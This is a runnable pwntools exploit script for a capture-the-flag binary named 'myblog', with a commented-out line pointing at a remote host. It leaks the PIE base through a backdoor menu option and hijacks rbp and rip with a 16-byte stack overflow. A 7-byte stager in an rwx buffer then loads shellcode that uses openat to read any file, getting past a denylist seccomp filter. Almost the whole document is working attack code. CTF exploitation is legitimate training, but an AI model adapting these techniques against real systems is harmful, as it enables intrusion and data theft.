import pwn
import sys
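pwn.context.arch = 'amd64'

# Exploit for the "myblog" CTF binary: leak the PIE base through a hidden
# menu entry, use a 16-byte stack overflow to return into the program's own
# show_owner call with a crafted rbp, land a 7-byte stager in the rwx owner
# buffer, and finally run a seccomp-compatible openat/read/write payload.
#
# Written to run unchanged under Python 2 and 3 (bytes literals, print()).

# The target path is spliced verbatim into assembler source below, so it is
# validated *before* anything is spawned: exactly one argument and no
# characters that would terminate or escape the `.string "..."` literal.
if len(sys.argv) != 2:
    sys.stderr.write("usage: %s <path-to-file-to-read>\n" % sys.argv[0])
    sys.exit(1)
target_path = sys.argv[1]
if '"' in target_path or "\\" in target_path or "\n" in target_path:
    sys.stderr.write("refusing a path containing a quote, backslash or newline\n")
    sys.exit(1)

r = pwn.process("./myblog")
#pwn.gdb.attach(r, "b read\n\n")
#r = pwn.remote("159.65.125.233", 31337)

"""
Stage 0 - leak.
Any menu operation ends in exit().  A hidden backdoor function prints its
own address ("I will give you a gift 0x..."), which is enough to recover the
binary base of the PIE.
"""
# backdoor leak
r.sendline(b"31337")
r.recvuntil(b"I will give you a gift 0x")
# recvn() blocks until all 12 hex digits have arrived; the original read(12)
# (an alias of recv) may return a short chunk and silently yield a bogus base.
BACKDOOR_OFFSET = 3828  # == 0xef4: distance of the leaked function from the base
blog_base_ptr = int(r.recvn(12), 16) - BACKDOOR_OFFSET
print("Binary base: 0x%x" % blog_base_ptr)
# A PIE base is page aligned; anything else means the leak or the offset is off.
if blog_base_ptr & 0xfff:
    sys.exit("leaked base 0x%x is not page aligned - wrong offset or bad leak"
             % blog_base_ptr)

"""
Stage 1 - rbp/rip control.
A 16-byte overflow past the buffer gives control of the saved rbp and rip.
Rather than a gadget, rip is pointed at the menu's own call to show_owner
(rip offsets in the binary must be above 0xfff, hence the leak).  vmmap shows
an rwx mapping; the owner string is stored there and a pointer to it lives in
.bss.  rbp is placed 8 bytes below that .bss slot so that the `leave; ret`
on the exit path pops the slot and jumps into the rwx mapping (per the
original analysis of the binary).
"""
call_show_owner = blog_base_ptr + 0x10c2
rwx_ptr = blog_base_ptr + 0x202048     # .bss slot holding the rwx buffer address
payload = b"A" * 8                     # padding up to the saved rbp
payload += pwn.p64(rwx_ptr - 8)        # rbp: leave -> rsp = rwx_ptr, ret pops *rwx_ptr
payload += pwn.p64(call_show_owner)    # rip
r.send(payload)
print(r.recvuntil(b"Done!!"))

"""
Stage 2 - 7-byte stager.
The author string is written into the rwx mapping, but only its first 7
bytes get executed.  At that moment rax == 0 (read) and rdi holds whatever
was left there (the original notes rely on it being usable as the fd -
presumably 0; not verifiable from this script).  After the `ret` into the
buffer rsp == rwx_ptr + 8, so `sub rsp, 8; pop rsi` loads the buffer's own
address into rsi and the syscall reads an arbitrarily long second stage on
top of the buffer.
"""
# execute buffer
shellcode = pwn.asm("sub rsp, 8; pop rsi; syscall")
# Only 7 bytes are executed, and stage 3 is sent with a 7-byte prefix that
# lands exactly on top of this stager - refuse to continue if the assembler
# produced anything else.
if len(shellcode) != 7:
    sys.exit("stager is %d bytes, expected 7" % len(shellcode))
r.send(shellcode)
print(r.recvuntil(b"Done!!"))
# do exit: leave; ret -> stager
r.send(b"4")
print(r.recvuntil(b"ByeBye"))

"""
Stage 3 - seccomp.
The program installs a seccomp filter:
[...]
prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) = 0
prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, {len=11, filter=0x7ffefe130eb0}) = 0
[...]
https://github.com/david942j/seccomp-tools
seccomp-tools dump ./myblog
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x06 0x00 0x40000000 if (A >= 0x40000000) goto 0010
0004: 0x15 0x05 0x00 0x00000002 if (A == open) goto 0010
0005: 0x15 0x04 0x00 0x0000003b if (A == execve) goto 0010
0006: 0x15 0x03 0x00 0x00000039 if (A == fork) goto 0010
0007: 0x15 0x02 0x00 0x0000003a if (A == vfork) goto 0010
0008: 0x15 0x01 0x00 0x00000038 if (A == clone) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x06 0x00 0x00 0x00000000 return KILL
The filter is a denylist: only open, execve, fork, vfork and clone (plus the
x32 ABI range) are killed, so openat - and every other syscall not listed -
is still allowed.  openat's directory descriptor is ignored when the path is
absolute; passing AT_FDCWD (-100) keeps absolute paths working and makes
relative paths resolve against the cwd as well.
"""
# second stage shellcode using sys_openat
# use the jmp/call trick to get a pointer to the path string in rsi
# openat -> read up to 1024 bytes onto the stack -> write exactly those bytes -> exit
readfile = """
jmp str;
ret:
pop rsi;
mov rdi, -100;
xor rdx, rdx;
xor r10, r10;
mov eax, 257;
syscall
mov rdi, rax;
mov rsi, rsp;
mov rdx, 1024;
mov eax, 0;
syscall;
mov rdx, rax;
mov rdi, 1;
mov eax, 1;
syscall;
mov eax, 60;
syscall
str:
call ret
.string "%s"
""" % target_path
# Register use above: openat(AT_FDCWD, path, O_RDONLY, 0); read(fd, rsp, 1024);
# `mov rdx, rax` then makes write(1, rsp, n) emit only the n bytes actually
# read instead of 1024 bytes of uninitialised stack; exit(...) afterwards.
readfile = pwn.asm(readfile)
r.sendline(b"A" * 7 + readfile)  # 7 bytes are already executed (the stager)
# read flag
flag = r.recvall().replace(b"\x00", b"")
print(flag.decode("utf-8", "replace"))
r.close()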